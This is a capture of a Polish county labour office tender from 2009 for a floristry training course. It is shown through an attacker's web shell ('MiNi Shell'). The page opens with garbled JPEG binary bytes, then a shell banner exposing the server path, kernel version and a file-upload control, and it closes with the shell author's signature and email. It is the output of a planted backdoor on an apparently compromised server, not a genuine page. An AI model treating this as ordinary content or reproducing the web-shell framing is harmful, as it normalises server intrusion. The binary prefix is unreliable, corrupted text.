JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090403/90214-N-2009.html

<p class="kh_header"><b>Kraków: Postępowanie o udzielenie zamówienia publicznego 
prowadzonego w trybie przetargu nieograniczonego o wartości poniżej 206 000 euro 
na usługę szkoleniową pod nazwą  
Florystyka z elementami dekoratorstwa małych form użytkowych  
znak sprawy: ZP- 271/7/2009</b><br>
<b>Numer ogłoszenia: 90214 - 2009; data zamieszczenia: 03.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Pracy Powiatu Krakowskiego , ul. Mazowiecka 21, 30-019 Kraków, woj. małopolskie, tel. 012 2997425, 012 6237480, faks 012 6325215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uppk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego 
prowadzonego w trybie przetargu nieograniczonego o wartości poniżej 206 000 euro 
na usługę szkoleniową pod nazwą  
Florystyka z elementami dekoratorstwa małych form użytkowych  
znak sprawy: ZP- 271/7/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie kursu pod nazwą Florystyka z elementami dekoratorstwa małych form użytkowych dla 20 osób bezrobotnych zarejestrowanych w Urzędzie Pracy Powiatu Krakowskiego.
1.	Program szkolenia składać się będzie ze 180 godzin lekcyjnych, przy czym należy przyjąć, że 1 godzina = 45 minut.
2.	Kurs odbywać się będzie w dwóch edycjach: 
a.	pierwsza edycja - II kwartał 2009 r., 
b.	druga edycja - IV kwartał 2009 r., przy czym druga edycja zakończyć się musi do 30 listopada 2009 r. 
W ramach każdej edycji Wykonawca przeszkoli 10 - osobowe grupy osób skierowanych. Każda edycja rozpocznie się pierwszego dnia roboczego miesiąca i trwać będzie sześć tygodni. W ramach każdego tygodnia zajęcia trwać będą 30 godzin oraz odbywać się będą codziennie od poniedziałku do piątku w godzinach pomiędzy 8.00 a 17.00.
3.	Program kursu musi zostać opracowany zgodnie z wymogami określonymi w rozporządzeniu Ministra Edukacji i Nauki z dn. 03 lutego 2006 roku w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r., Nr 31, poz. 216) oraz wykorzystywać standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępne w bazach danych prowadzonych przez MPiPS na stronie internetowej www.standardyiszkolenia.praca.gov.pl a także zawierać następujące moduły tematyczne:
 a)	Suszenie i utrwalanie roślin
	zbiór roślin i przygotowanie do suszenia
	technika suszenia, przechowywanie
	dobór gatunków roślin i przygotowanie do suszenia
	Dekoracje ślubne i komunijne
b)	Wiązanki ślubne i zasady układania roślin
	Rośliny i materiały stosowane do wiązanek ślubnych
	Wiązanka spływająca
	Wiązanki fantazyjne
	Dobór gatunków roślin do wianka
	Technika wykonywania wianka i wiązanki komunijnej
	Wiązanki i dekoracje okolicznościowe
	Dobór kwiatów do kompozycji
	Technika układania kwiatów
	Stroiki na Boże Narodzenie i Wielkanoc
c)	Florystyka pogrzebowa
	Dobór materiałów do dekoracji pogrzebowych
	Rodzaje dekoracji i technika wykonania
d)	Dekoracje okolicznościowe małe formy użytkowe
	Artystyczne pakowanie przedmiotów
	Dekoracja szkła, bombek, pisanek
	Elementy decoupage
	Tworzenie bilecików oraz kart okolicznościowych.
4.	Szkolenie zakończy się wydaniem uczestnikom zaświadczenia opatrzonego logo Unii Europejskiej i Projektu 7 Życzeń. 
5.	Wykonawca zobowiązany będzie wyposażyć każdego uczestnika zajęć w materiały dydaktyczne, zgodnie z zakresem tematycznym kursu, w ilości i asortymencie niezbędnym do prawidłowej realizacji programu kursu.
6.	Wykonawca zobowiązany będzie do informowania społeczeństwa o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczanie w dokumentacji szkoleniowej informacji o udziale Unii Europejskiej a także oznakowania miejsca realizacji kursu, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.7.2006) oraz Rozporządzenia Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr 1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006)  i wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013.
7.	Wykonawca zobowiązany będzie do przechowywania dokumentów potwierdzających realizację przedmiotowego szkolenia, a w szczególności: programu szkolenia, harmonogramu, dokumentów związanych z kosztami kursu, kosztorys, listy obecności uczestników, do dnia 31 grudnia 2020 roku.
8.	Na zakończenie kursu, Wykonawca wypłaci uczestnikom szkolenia zwrot kosztów przejazdu w wysokości 10,00 PLN (słownie: dziesięć złotych 00/100) za każdy dzień obecności na zajęciach. Podstawą do naliczenia wysokości zwrotu będzie lista obecności. Kwotę zwrotu kosztów przejazdu za 20 uczestników kursu należy wliczyć w cenę szkolenia wskazaną w formularzu ofertowym.
9.	Na podstawie art. 41 ust.7 i ust. 8 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r., Nr 69, poz. 415 z późn. zm.) Wykonawca zobowiązany będzie do ubezpieczenia uczestników kursu do następstw nieszczęśliwych wypadków z wyłączeniem osób posiadających prawo do stypendium szkoleniowego. Okres ubezpieczenia obejmie cały okres trwania szkolenia. Wykonawca dokona ubezpieczenia kursantów na podstawie imiennej listy sporządzonej przez Zamawiającego. 
Wykonawca przedstawi Zamawiającemu kopię polisy ubezpieczeniowej najpóźniej w dniu rozpoczęcia zajęć.
10.	Wykonawca zobowiązany będzie do prowadzenia dokumentacji oznakowanej odpowiednimi symbolami i logo projektu, tj: 
a)	Dzienna listy obecności uczestników szkolenia;
b)	Dziennik zajęć zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych;
c)	Oświadczenia uczestników potwierdzających odbiór materiałów dydaktycznych i biurowych;
d)	Oświadczenia uczestników potwierdzających odbiór ciepłych posiłków;
e)	Imienna lista, na której uczestnicy szkolenia będą potwierdzać otrzymanie zwrotu kosztów przejazdu na szkolenie;
f)	Rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenie; 
g)	Protokół z egzaminu, jeżeli zostanie przeprowadzony. 
11	Wykonawca, pod  rygorem  utraty prawa do zapłaty za  szkolenie Uczestników, zobowiązany będzie do niezwłocznego   poinformowania Zamawiającego  o:
a)	nie zgłoszeniu się Uczestników na  szkolenie,
b)	przerwaniu szkolenia lub rezygnacji  z  uczestnictwa oraz każdorazowej nieobecności skierowanych  osób bezrobotnych,
c)	innych sytuacjach, które mają wpływ na realizację programu szkolenia. i umowy.
12	Wykonawca zobowiązany będzie do przekazania Zamawiającemu, w terminie do 5 dni od dnia zakończenia szkolenia, następujących dokumentów:
a)	Oryginału ankiet oceniających przeprowadzonych wśród uczestników szkolenia;
b)	Oryginału imiennego wykazu osób, które ukończyły szkolenie;
c)	Oryginału imiennego wykazu osób, które nie ukończyły szkolenia; 
d)	Kserokopii rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji poświadczony za zgodność z oryginałem;
e)	Kserokopii dziennika zajęć poświadczona za zgodność z oryginałem;
f)	Kserokopii list obecności poświadczona za zgodność z oryginałem;
g)	Kserokopii protokołu z egzaminu;
h)	Oryginału kosztorysu powykonawczego;
i)	Kserokopii wszystkich zaświadczeń i certyfikatów potwierdzających ukończenie szkolenia, poświadczone za zgodność z oryginałem;
j)	Oryginału oświadczeń uczestników potwierdzających odbiór materiałów dydaktycznych, ciepłych posiłków;
k)	Oryginału imiennej listy, na której uczestnicy potwierdzą otrzymanie zwrotu kosztów przejazdu;
l)	Inną dokumentację niezbędną do rozliczenia kursu.
13	Miejsce realizacji zajęć musi być usytuowane dogodnie pod względem dojazdu dla osób z terenu Powiatu Krakowskiego i znajdować się w mieście Krakowie.
14	Wykonawca winien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. Sale dydaktyczne powinny być wyposażone stosownie do potrzeb jednoczesnej realizacji zajęć dydaktycznych dla dwóch 20-osobowych grup słuchaczy, tj. w miejsca siedzące, ławki/stoliki, sprzęt audiowizualny, flipchart, tablice szkolne lub magnetyczne.  
Do oferty należy załączyć informację dotyczącą lokalizacji, w której realizowane będą zajęcia wraz ze szczegółowym opisem wyposażenia sal dydaktycznych.
Zamawiający zastrzega sobie prawo przeprowadzania niezapowiedzianych wizyt monitorujących, w trakcie których przeprowadzana będzie kontrola przebiegu szkolenia pod względem poprawności realizacji Umowy. W związku z powyższym, Wykonawca zapewni wgląd w dokumentację szkolenia na każdym etapie jego realizacji.
15.	Wykonawca zobowiązany będzie do przeprowadzenia wśród uczestników zajęć oceny merytorycznej i technicznej przebiegu szkolenia, m.in. na podstawie formularza ankiety oceniającej - stanowiącej załącznik nr 7 do SIWZ, jak również do przedstawienia jej wyników Zamawiającemu. 
16.	Wykonawca, przed rozpoczęciem szkolenia, zobowiązany będzie do zapoznania jego uczestników ze szczegółowym programem poprzez przekazanie im harmonogramu realizowanych zajęć..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymaga się wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych:
1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, a w szczególności uzyskali wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej - art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r., Nr 69, poz. 415 z późn. zm.);
2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub będą dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, a w szczególności
a.	przeprowadzili w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 3 szkolenia z zakresu objętego przedmiotowym zamówieniem;
b.	przeszkolili z zakresu objętego przedmiotowym zamówieniem, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 30 osób; 
3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia,  w oparciu o informacje zawarte w złożonych oświadczeniach i dokumentach wyszczególnionych w  dziale IV SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił. Niespełnienie tych warunków będzie skutkować wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Formularz ofertowy - załącznik nr 1 do SIWZ;
2.	Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy         z dnia 29 stycznia 2004 r. Prawo zamówień publicznych -  załącznik  nr 2 do SIWZ; 
3.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej), wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
5.	Wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej;
6.	Szczegółowy program szkolenia opracowany na podstawie wytycznych zawartych              w punkcie I podpunkt 3 SIWZ;
7.	Harmonogram zajęć rozpisany na poszczególne dni trwania szkolenia, z podaniem tematyki  i rodzaju zajęć, czasu ich trwania oraz nazwiska osoby prowadzącej oraz uwzględnieniem warunku wskazanego w punkcie I podpunkt 3 SIWZ.
8.	Wykaz zrealizowanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, szkoleń z zakresu florystyki z elementami dekoratorstwa małych form użytkowych,             z podaniem ilości przeszkolonych osób, dat realizacji oraz odbiorców, załącznik nr 3 do SIWZ. 
Na potwierdzenie należytego zrealizowania wykazanych usług należy załączyć stosowne dokumenty (np. referencje). Zamawiający, podczas liczenia punktacji, będzie brał pod uwagę tylko te szkolenia, których rzetelność realizacji poświadczona zostanie powyższymi dokumentami;
9.	Pełnomocnictwo pracownika/osoby do reprezentowania wykonawcy w postępowaniu przetargowym w tym podpisywania dokumentów przetargowych, jeżeli nie wynika to z dokumentu rejestracyjnego (ewidencyjnego), o którym mowa w podpunkcie 3; 
10.	Propozycje zlecenia wykonania części usług podwykonawcom z określeniem zakresu realizowanych przez nich prac, załącznik nr 5 do SIWZ;
11.	Preliminarz kosztów - załącznik nr 4 do SIWZ.
12.	Certyfikat jakości usług (np.: akredytacja kuratora oświaty, certyfikat systemu zarządzania jakością kształcenia/szkolenia) wydany przez instytucję do tego uprawnioną, który potwierdzałby wysoki standard świadczonych usług, jeżeli Wykonawca taki posiada..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - liczba przeprowadzonych szkoleń z zakresu objętego przedmiotowym zamówieniem - 10</li>
<li>3 - liczba osób przeszkolonych z zakresu objętego przedmiotowym zamówieniem - 10</li>
<li>4 - certyfikat jakości usług, który potwierdzałby wysoki standard świadczonych usług - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uppk.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2009 godzina 10:00, miejsce: URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro
stanowisko dziennika podawczego-pokój 910.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT  WSPÓŁFINANSOWANY 
Z EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO
REALIZOWANY W RAMACH 
PODDZIAŁANIA 6.1.3

Creat By MiNi SheLL
Email: jattceo@gmail.com